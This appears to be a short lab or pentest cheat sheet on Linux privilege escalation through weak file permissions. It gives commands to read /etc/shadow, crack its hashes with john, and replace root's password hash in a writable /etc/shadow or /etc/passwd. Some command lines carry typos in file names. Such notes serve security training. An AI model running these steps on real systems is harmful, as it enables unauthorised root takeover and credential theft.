# Weak File Permissions

### Readable /etc/shadow

{% hint style="info" %}
Note: the /etc/shadow file on the VM is world-readable
{% endhint %}

```
ls -l /etc/shadow
```

View the contents

```
cat /etc/shadow
```

Copy the hash from the file and crack the password using any password-cracking tool.

```
john --wordlist=/usr/share/wordlists/rockou.txt has.txt
```

Then use the cracked password to gain access.

### Writable /etc/shadow

Note that the /etc/shadow file on the VM is world-writable:

```
ls -l /etc/shadow
```

If they are writable  then generate a new password hash with the password of your choice

```
mkpasswd -m sha-512 password1234
```

Edit the /etc/shadow file and replace the original root user's password hash with the new password that you generated.

### Writable /etc/passwd

Historically the /etc/passwd file contained user password hashes and some versions of Linux will still allow password hashes to be stored there.

Step 1: Check Permissions

```
ls -l /etc/passwd
```

Step 2: Generate a new password

```
openssl passwd password1234
```

Step 3: Edit the /etc/passwd file and place the generated password hash between the first and second colon(:) of the root user's row.